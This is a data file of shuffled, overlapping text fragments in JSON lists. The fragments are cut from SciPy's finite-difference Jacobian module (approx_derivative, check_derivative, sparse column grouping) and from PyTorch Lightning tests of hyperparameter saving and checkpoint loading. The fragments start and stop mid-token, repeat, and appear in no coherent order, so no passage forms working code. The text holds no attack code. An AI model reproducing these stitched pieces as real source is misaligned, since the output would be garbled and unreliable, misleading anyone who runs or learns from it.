absolute", "---------- x0 : ndarray, shape (n,) Point at which we", "e if method == '2-point': x = x0 + h_vec", "Bounds can be used to limit the region of function", "with absolute values less or equal than 1. If `accuracy`", ": array_like of shape (n,) or float Point at which", "h.copy() lower_dist = x0 - lb upper_dist = ub -", "def _prepare_bounds(bounds, x0): lb, ub = [np.asarray(b, dtype=float) for b", "1 return rel_step * sign_x0 * np.maximum(1.0, np.abs(x0)) def _prepare_bounds(bounds,", "(default), a standard dense differencing will be used. Note, that", "x = x0 + dx*p*1.j f1 = fun(x) df =", "columns which correspond to perturbed # variables. cols, = np.nonzero(e)", "(n,), but does not allow direct access to individual elements", "must be '1-sided' or '2-sided'.\") if np.all((lb == -np.inf) &", "(Jacobian or gradient) by comparison with a finite difference approximation.", "range of function evaluation. args, kwargs : tuple and dict,", "..sparse import issparse, csc_matrix, csr_matrix, coo_matrix, find from ._group_columns import", "= find(structure[:, cols]) # Restore column indices in the full", "method to use: - '2-point' - use the first order", "num_steps h_adjusted = h.copy() lower_dist = x0 - lb upper_dist", "= _prepare_bounds(bounds, x0) if lb.shape != x0.shape or ub.shape !=", "def jac(x, c1, c2): ... return np.array([ ... [np.sin(c1 *", "evaluation. Bounds checking is not implemented when `as_linear_operator` is True.", "def _compute_absolute_step(rel_step, x0, method): if rel_step is None: rel_step =", "calling signature is ``fun(x, *args, **kwargs)`` and the same for", "h_vec = h * e if method == '2-point': x", "matrix of shape (m, n). A zero element means that", "\"\"\" J_to_test = jac(x0, *args, **kwargs) if issparse(J_to_test): J_diff =", "backward = (upper_dist < lower_dist) & ~central h_adjusted[backward] = -np.minimum(", "to R^m, its derivatives form m-by-n matrix called the Jacobian,", "a vector-valued function. If a function maps from R^n to", "a sparse matrix is interpreted as a sparsity structure, and", "+ dx*p*1.j f1 = fun(x) df = f1.imag return df", "= h_vecs[i, i] else: raise RuntimeError(\"Never be here.\") J_transposed[i] =", ": 2-tuple of array_like, optional Lower and upper bounds on", "= fun(x) - f0 # The result is written to", "we need to evaluate f(x0 + 2 * h) or", "means that a corresponding element of the Jacobian identically equals", "differencing when m=1 Jacobian is returned with a shape (n,),", "dense differencing will be used. Note, that sparse differencing makes", "= use_one_sided & e x1[mask_1] += h_vec[mask_1] x2[mask_1] += 2", "= _adjust_scheme_to_bounds( x0, h, 1, '1-sided', lb, ub) elif method", "'2-point': x = x0 + h_vecs[i] dx = x[i] -", "estimate the derivatives. Float will be converted to a 1-D", "groups : array_like of shape (n,). A column grouping for", "If `rel_step` is not provided, it assigned to ``EPS**(1/s)``, where", "sufficiently far from the boundary, and 3-point forward or backward", "f1.imag return df / dx else: raise RuntimeError(\"Never be here.\")", "= fun(x1) f2 = fun(x2) df = -3.0 * f0", "(x > ub) fitting = np.abs(h_total) <= np.maximum(lower_dist, upper_dist) h_adjusted[violated", "is None: rel_step = relative_step[method] return _linear_operator_difference(fun_wrapped, x0, f0, rel_step,", "coo_matrix. row_indices.append(i) col_indices.append(j) fractions.append(df[i] / dx[j]) row_indices = np.hstack(row_indices) col_indices", "bounds on independent variables. Defaults to no bounds. Each bound", "-c2 * x[0] * np.sin(c2 * x[1])] ... ]) ...", "Finite difference approximation of the Jacobian matrix. If `as_linear_operator` is", "or a sparse matrix depending on `sparsity`. The linear operator", "f0=None, bounds=(-np.inf, np.inf), sparsity=None, as_linear_operator=False, args=(), kwargs={}): \"\"\"Compute finite difference", "(never a scalar even if n=1). It must return 1-D", "elif scheme == '2-sided': central = (lower_dist >= h_total) &", "significantly less than n. References ---------- .. [1] <NAME>, <NAME>,", "is written to columns which correspond to perturbed # variables.", "assumes that the user function is real-valued and can be", "assumed to be equal to ``fun(x0)``, in this case the", "Defines a sparsity structure of the Jacobian matrix. If the", "shape (n,) Point at which we wish to estimate derivative.", "of shape (n,) or float Point at which to estimate", "or a sparse matrix is interpreted as a sparsity structure,", "matrices where each row contains few non-zero elements. as_linear_operator :", "with a shape (n,), on the other hand when n=1", "bounds : 2-tuple of array_like, optional Lower and upper bounds", "sign_x0 * np.maximum(1.0, np.abs(x0)) def _prepare_bounds(bounds, x0): lb, ub =", "-3 * f0[rows] + 4 * f1[rows] - f2[rows] rows", "(n,) Desired finite difference steps. num_steps : int Number of", "2: structure, groups = sparsity else: structure = sparsity groups", "dense array or a sparse matrix depending on `sparsity`. The", "Returns ------- accuracy : float The maximum among all relative", "numpy as np >>> from scipy.optimize import approx_derivative >>> >>>", "Find all non-zero elements in selected columns of Jacobian. i,", "c1 * x[0] * np.cos(c1 * x[1])], ... [np.cos(c2 *", "is used to construct groups. Parameters ---------- A : array_like", "to use: - '2-point' - use the first order accuracy", "df / dx else: raise RuntimeError(\"Never be here.\") return LinearOperator((m,", "be here.\") # All that's left is to compute the", "a 2-D matrix for sparse finite differencing [1]_. Two columns", "group in range(n_groups): # Perturb variables which are in the", "sparsity : {None, array_like, sparse matrix, 2-tuple}, optional Defines a", "x0[mask_1] dx[mask_2] = x2[mask_2] - x1[mask_2] f1 = fun(x1) f2", "= x0 + 2 * h_vecs[i] dx = x2[i] -", "x2 = x0 + h_vecs[i] dx = x2[i] - x1[i]", "df = np.empty(m) rows = i[mask] df[rows] = -3 *", "to 1-D array. bounds : 2-tuple of array_like, optional Lower", "None or array_like, optional Relative step size to use. The", "*args, **kwargs)) if f.ndim > 1: raise RuntimeError(\"`fun` return value", "<NAME>, \"On the estimation of sparse Jacobian matrices\", Journal of", "Mathematics and its Applications, 13 (1974), pp. 117-120. \"\"\" if", "matrix. By default `as_linear_operator` is False. args, kwargs : tuple", "None. bounds : tuple of array_like, optional Lower and upper", "a function computing derivatives (Jacobian or gradient) by comparison with", "for points near the boundary. Both schemes have the second-order", "J_diff = approx_derivative(fun, x0, bounds=bounds, args=args, kwargs=kwargs) abs_err = np.abs(J_to_test", "None: return _dense_difference(fun_wrapped, x0, f0, h, use_one_sided, method) else: if", "the example below we compute left and right derivative at", "or equal than 1. If `accuracy` is on the order", "for points sufficiently far from the boundary, and 3-point forward", "`fun`. The return value must be array_like or sparse matrix", "dimension.\") lb, ub = _prepare_bounds(bounds, x0) if lb.shape != x0.shape", "function evaluation [3]_. To perform such economic computations two ingredients", "\"\"\"Adjust final difference scheme to the presence of bounds. Parameters", "x0[i] f1 = fun(x1) f2 = fun(x2) df = -3.0", "round-off errors, see [1]_. A finite difference scheme for '3-point'", "= fun(x1) f2 = fun(x2) df = f2 - f1", "f0 is None: f0 = fun_wrapped(x0) else: f0 = np.atleast_1d(f0)", "means that we need to evaluate f(x0 + 2 *", "of shape (n,). A column grouping for a given sparsity", "motivation is the following: a) It handles a case of", "is not provided, it assigned to ``EPS**(1/s)``, where EPS is", "= csc_matrix(structure) else: structure = np.atleast_2d(structure) groups = np.atleast_1d(groups) return", "issparse(A): groups = group_sparse(m, n, A.indices, A.indptr) else: groups =", "= df / dx if m == 1: J_transposed =", "1: raise ValueError(\"`f0` passed has more than 1 dimension.\") if", "... return x**2 if x >= 1 else x ...", "x0, f0, h, method): m = f0.size n = x0.size", "Jacobian matrix of `fun`. It must work with argument x", "independent variables. ub : ndarray, shape (n,) Upper bounds on", "if scheme == '1-sided': x = x0 + h_total violated", ": ndarray of int, shape (n,) Contains values from 0", "use_one_sided = np.zeros_like(h, dtype=bool) else: raise ValueError(\"`scheme` must be '1-sided'", "sparse matrix is interpreted as a sparsity structure, and groups", "`rel_step` is not provided, it assigned to ``EPS**(1/s)``, where EPS", "Both schemes have the second-order accuracy in terms of Taylor", "_sparse_difference(fun_wrapped, x0, f0, h, use_one_sided, structure, groups, method) def _linear_operator_difference(fun,", "= coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n)) return csr_matrix(J) def check_derivative(fun,", "A.shape if order is None or np.isscalar(order): rng = np.random.RandomState(order)", "has more than 1 dimension.\") if np.any((x0 < lb) |", "order = np.asarray(order) if order.shape != (n,): raise ValueError(\"`order` has", "kwargs : tuple and dict, optional Additional arguments passed to" ]
[ "2.0 (the \"License\"); # you may not use this file", "# ------------------------- def test_class_nesting(): class MyModule(LightningModule): def forward(self): ... #", "can overwrite whatever we want raw_checkpoint_path = _raw_checkpoint_path(trainer) model =", "Trainer, LightningModule from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml from pytorch_lightning.utilities import", "the constructor \"\"\" extra_args = {} if cls is AggSubClassEvalModel:", "any argument in init.\"\"\" model = cls() trainer = Trainer(", "= MyModule() _ = a.hparams def test2(self): test_outside() test_outside() A().test2()", "test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir)) trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2,", "1), **kwargs): super().__init__(**kwargs) assert not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model", "test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the model takes only valid class arguments.\"\"\"", "explicit setter \"\"\" def __init__(self, hparams): super().__init__() self.hparams = hparams", "training_step(self, batch, batch_nb): x, y = batch loss = F.cross_entropy(self(x),", "import LocalFileSystem from omegaconf import OmegaConf, Container from torch.nn import", "correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path =", "non_exist_kwarg=99) assert 'non_exist_kwarg' not in model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self,", "AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def __init__(self,", "arg1 = 'overwritten' local_var = 1234 self.save_hyperparameters() # this is", "import Trainer, LightningModule from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml from pytorch_lightning.utilities", "\"\"\" Tests that a model can take an object \"\"\"", "not call self.save_hyperparameters() self.hparams = hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading", "config): # \"\"\" Test that the model automatically saves the", "is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model =", "cls(config) # # # no matter how you do it,", "super().__init__() self._hparams = None # pretend EvalModelTemplate did not call", "= hparams # ------------------------- # STANDARD TESTS # ------------------------- def", "isinstance(model2.hparams, Container) # config specific tests assert model2.hparams.test_arg == 14", "assert not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer", "verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model)", "we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) #", "__init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate,", "'overwritten' local_var = 1234 super().__init__(*args, **kwargs) # this is intentionally", "License for the specific language governing permissions and # limitations", "15 # verify that the checkpoint saved the correct values", "assert model.hparams.dict_conf['my_param'] == 'anything' # verify that we can overwrite", "batch_size=99) assert model.hparams.batch_size == 99 def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths", "2 # @pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel, Namespace(my_arg=42)), # (SaveHparamsModel, dict(my_arg=42)),", "cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert model.hparams.batch_size ==", "(AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) # def test_single_config_models(tmpdir,", "train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # make sure the", "takes positional arg, subclass takes varargs. \"\"\" hparams = dict(test=1)", "model loads correctly model = cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179", "pickle from argparse import Namespace import cloudpickle import pytest import", "we can overwrite whatever we want model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99)", "nn.Module a = MyModule() assert isinstance(a, torch.nn.Module) def test_outside(): a", "model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir): ad", "os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model has", "overfit_batches=2) trainer.fit(model) # make sure the raw checkpoint saved the", "__init__(self, hparams): super().__init__() self._hparams = None # pretend EvalModelTemplate did", "= _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] =", "should accept hparams and init in the super class \"\"\"", "\"\"\" def __init__(self, arg1, arg2, *args, **kwargs): self.argument1 = arg1", "= cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size == 99 def _raw_checkpoint_path(trainer) ->", "# STANDARD TESTS # ------------------------- def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False):", "__init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2):", "setter \"\"\" def __init__(self, hparams): super().__init__() self.hparams = hparams #", "cls, try_overwrite=False): \"\"\" Tests for the existence of an arg", "= cls(hparams=conf) assert isinstance(model.hparams, Container) # run standard test suite", "call at the end. \"\"\" def __init__(self, arg1, arg2, *args,", "for the existence of an arg 'test_arg=14' \"\"\" hparam_type =", "-1 model.hparams = Namespace(abc=42) assert model.hparams.abc == 42 trainer =", "max_epochs=1, overfit_batches=2) trainer.fit(model) # make sure the raw checkpoint saved", "initial hparams, no other runtime change allowed\"\"\" model = cls(running_arg=123)", "== 15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests that a model can", "the model takes only valid class arguments.\"\"\" class LocalModel(EvalModelTemplate): def", "anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) ==", "class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that has an attribute that", "test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml =", "test_step(self, batch, batch_nb): x, y = batch loss = F.cross_entropy(self(x),", "values # trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model) #", "cls(running_arg=123) assert model.hparams.running_arg == 123 model.hparams.running_arg = -1 assert model.hparams.running_arg", "default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir,", "**kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that", "OF ANY KIND, either express or implied. # See the", "= cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179 if isinstance(model, AggSubClassEvalModel): assert", "passing unsupported config type. \"\"\" with pytest.raises(ValueError): _ = cls(**config)", "run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel) model", "See the License for the specific language governing permissions and", "14 # verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=2,", "to in writing, software # distributed under the License is", "model = cls(hparams={'test_arg': 14}) # run standard test suite _run_standard_hparams_test(tmpdir,", "values trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer)", "call self.save_hyperparameters() self.hparams = hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this", "OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)])) model = cls(hparams=conf) assert isinstance(model.hparams, Container)", "verify that we can overwrite whatever we want raw_checkpoint_path =", "_run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False): \"\"\" Tests for the existence of", "or agreed to in writing, software # distributed under the", "= EvalModelTemplate() # verify we can train trainer = Trainer(default_root_dir=tmpdir,", "overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY", "load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml,", "def test_step(self, batch, batch_nb): x, y = batch loss =", "model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg == 14 assert 'test_arg2'", "elif cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert model.hparams.batch_size", "(SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel,", "raw checkpoint saved the properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint =", "= 'Namespace' raw_checkpoint[past_key]['batch_size'] = -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back", "verify that model loads correctly # raw_checkpoint_path = _raw_checkpoint_path(trainer) #", "compliance with the License. # You may obtain a copy", "the raw checkpoint saved the properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint", "test_omega_conf_hparams(tmpdir, cls): # init model conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1,", "arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2): super().__init__()", "configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def", "we want raw_checkpoint_path = _raw_checkpoint_path(trainer) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert", "raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\"", "here at the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ])", "= os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml,", "\"\"\" Tests that only the arguments are collected and not", "path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') ==", "correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir):", "not use this file except in compliance with the License.", "got an unexpected keyword argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def", "class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take an", "{'loss': loss, 'log': {'train_loss': loss}} def configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02)", "standard test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def", "that model loads correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg ==", "'pickle_me' removed from hparams because it cannot be pickled\"): trainer.fit(model)", "you may not use this file except in compliance with", "cls(arg1=1, arg2=2) assert 'local_var' not in model.hparams assert model.hparams['arg1'] ==", "cls() trainer = Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(),", "# intentionally named obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def", "pytorch_lightning.utilities import AttributeDict, is_picklable from tests.base import EvalModelTemplate, TrialMNIST, BoringModel", "and init in the super class \"\"\" def __init__(self, *args,", "'pickle_me' not in model.hparams def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001,", "def configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel, ])", "\"\"\" with pytest.raises(ValueError): _ = cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir,", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "\"\"\" A model that has an attribute that cannot be", "cannot be pickled\"): trainer.fit(model) assert 'pickle_me' not in model.hparams def", "model = LocalModel(test_arg=14, test_arg2=90) # test proper property assignments assert", "train trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) # make sure", "def test_implicit_args_hparams(tmpdir): \"\"\" Tests that a model can take regular", "define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg',", "test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir,", "raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size'] = -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save", "assert isinstance(a, torch.nn.Module) def test_outside(): a = MyModule() _ =", "self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2)", "'.ckpt' in x] assert raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path =", "model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg') model", "78 return raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): #", "isinstance(a, torch.nn.Module) def test_outside(): a = MyModule() _ = a.hparams", "functional as F from torch.utils.data import DataLoader from pytorch_lightning import", "test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that do not tae any argument", "'non_exist_kwarg' not in model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams): super().__init__()", "RuntimeParamChangeModelAssign(BoringModel): def __init__(self, **kwargs): super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving,", "EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir, cls):", "\"\"\" # model = cls(config) # # # no matter", "self.save_hyperparameters('test_arg', 'test_arg2') model = LocalModel(test_arg=14, test_arg2=90) # run standard test", "_raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size']", "config specific tests assert model2.hparams.test_arg == 14 assert model2.hparams.mylist[0] ==", "if cls is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything')))", "isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) if isinstance(model, DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param']", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "Tests that a model can take an object \"\"\" def", "passed into the constructor \"\"\" extra_args = {} if cls", "import Namespace import cloudpickle import pytest import torch from fsspec.implementations.local", "LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that", "class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this model should accept hparams and", "test_arg2): super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90) # run standard", "assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that model loads correctly", "x] assert raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path)", "in the super class \"\"\" def __init__(self, *args, **kwargs): super().__init__(*args,", "args and assign \"\"\" # define model class LocalModel(EvalModelTemplate): def", "try_overwrite=False): \"\"\" Tests for the existence of an arg 'test_arg=14'", "# run standard test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel,", "intentionally here at the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast,", "file except in compliance with the License. # You may", "(AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls, config):", "'log': {'train_loss': loss}} def test_step(self, batch, batch_nb): x, y =", "AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take an object", "has the _auto_collect_arguments() call at the end. \"\"\" def __init__(self,", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) # make sure the", "can take implicit args and assign \"\"\" # define model", "cls(hparams=Namespace(test_arg=14)) # run standard test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\",", "change allowed\"\"\" model = cls(running_arg=123) assert model.hparams.running_arg == 123 model.hparams.running_arg", "a = MyModule() assert isinstance(a, torch.nn.Module) def test_outside(): a =", "registered in class init return raw_checkpoint_path # ------------------------- # SPECIFIC", "arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls, config): \"\"\" Test fail on", "pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate):", "pickle_me=(lambda x: x + 1), **kwargs): super().__init__(**kwargs) assert not is_picklable(pickle_me)", "arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def", "__init__(self, **kwargs): super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def", "be pickled\"): trainer.fit(model) assert 'pickle_me' not in model.hparams def test_hparams_save_yaml(tmpdir):", "raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that model loads correctly model2", "self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(),", "@pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): # init model model", "# # # verify that the checkpoint saved the correct", "language governing permissions and # limitations under the License. import", "torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 #", "model.hparams['arg2'] == 2 # @pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel, Namespace(my_arg=42)), #", "def test_args(tmpdir): \"\"\" Test for inheritance: super class takes positional", "def __init__(self): super().__init__() self.l1 = torch.nn.Linear(28 * 28, 10) def", "y) return {'loss': loss, 'log': {'train_loss': loss}} def configure_optimizers(self): return", "assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams", "**kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel,", "'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__() self.save_hyperparameters() class", "constructor \"\"\" extra_args = {} if cls is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss())", "verify that we can overwrite the property model3 = cls.load_from_checkpoint(raw_checkpoint_path,", "-17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path)", "= hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this model should accept", "_raw_checkpoint_path(trainer) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert 'non_exist_kwarg' not in model.hparams", "42 class AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate):", "This model has the _auto_collect_arguments() call at the end. \"\"\"", "KIND, either express or implied. # See the License for", "model.hparams.my_arg == 42 # # # verify that the checkpoint", "assert model.hparams.my_arg == 42 # # # verify that the", "sure the raw 